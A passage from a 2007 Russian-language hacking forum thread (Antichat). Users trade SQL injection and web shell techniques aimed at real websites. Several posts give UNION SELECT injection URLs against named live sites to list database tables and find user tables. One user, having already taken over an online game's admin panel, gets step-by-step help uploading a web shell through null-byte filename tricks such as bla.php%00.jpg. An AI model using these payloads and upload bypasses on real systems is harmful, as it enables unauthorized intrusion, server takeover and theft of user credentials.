15.12.2007, 02:38
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Если да, то почему у меня не получается ???
Потому что в запросе ты указал таблицу для вывода, а колонки нет.
И еще вопрос можно ли изменить ячейку в любом столбце, например поставить в столбце «уровень админа» 1 или нет???
Если бд mysql - нет.
Последний раз редактировалось delay(0); 15.12.2007 в 02:39..
Причина: Спайдерик опередил =\
|
|
|
15.12.2007, 02:55
|
|
Участник форума
Регистрация: 23.11.2006
Сообщений: 143
Провел на форуме:
622668
Репутация:
92
|
|
Если сайт перевести частично на мод.рерайт. К примеру, элементы вида ' index.php?page=1 ' преобразились в вид ' /page/1/ ' то есть получается, что проверка на фильтрацию сводится до минимума и вандалам не найти sql.inj, не так ли?
Я не о том, что игнориуется она в случае перехода к чпу. Возможно ли благодаря мод.рерайт обезопасить портал? И может быть он не столь эффективен? Спасиб.)
|
|
|
|
15.12.2007, 03:12
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
какая разница?
/page/1'
=\
|
|
|
|
15.12.2007, 03:15
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Расскажите ка мне в чём проблема =)
http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8 ,9,20
http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8 ,9,20+from+information_schema.tables
|
|
|
|
15.12.2007, 03:41
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
юзеру мускула не хватает прав для листинга метадаты в этом фолдере хран. information_schem'ы
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
15.12.2007, 15:10
|
|
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме:
197892
Репутация:
11
|
|
Ситуация: нашел sql инъекцию, узнал пасс админа, зашел под админом. Могу присвоить картинки некоторым предметам, изменять некоторые предметы. И все. Как можно залить шелл??? Пробовал присвоить картинку шелл.рнр , но там есть фильтр. Помогите залить шелл.
|
|
|
|
15.12.2007, 15:22
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
а что за админка то? насколько я понял возможен аплоад файлов попробуй впиши веб шелл в файлы с именами bla.php%00.jpg или bla.php.rar...
__________________
Кто я?..
|
|
|
|
15.12.2007, 15:44
|
|
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме:
197892
Репутация:
11
|
|
Админка от онлайн игры.
Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.
|
|
|
|
15.12.2007, 15:47
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
Провел на форуме:
4778940
Репутация:
1257
|
|
помогите подобрать таблу с юзерами
http://wapclick.info/forum/readmess.php?UIN=Guest&pass=Guest&next_row=1&topic =-1+union+select+0,0,1,0,2,0/*&room=1&user=1
Последний раз редактировалось mr.The; 15.12.2007 в 15:53..
Причина: Вот!
|
|
|
|
15.12.2007, 15:55
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.
Пр удачной для тебя настройке сервера, т е magic_quotes_gpc=off и наличии кривого скрипта, файл загурзится с именем bla.php%00.jpg, после вызова функции copy() нулевой байт откинет разшерение .jpg и у тебя будет файл bla.php
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
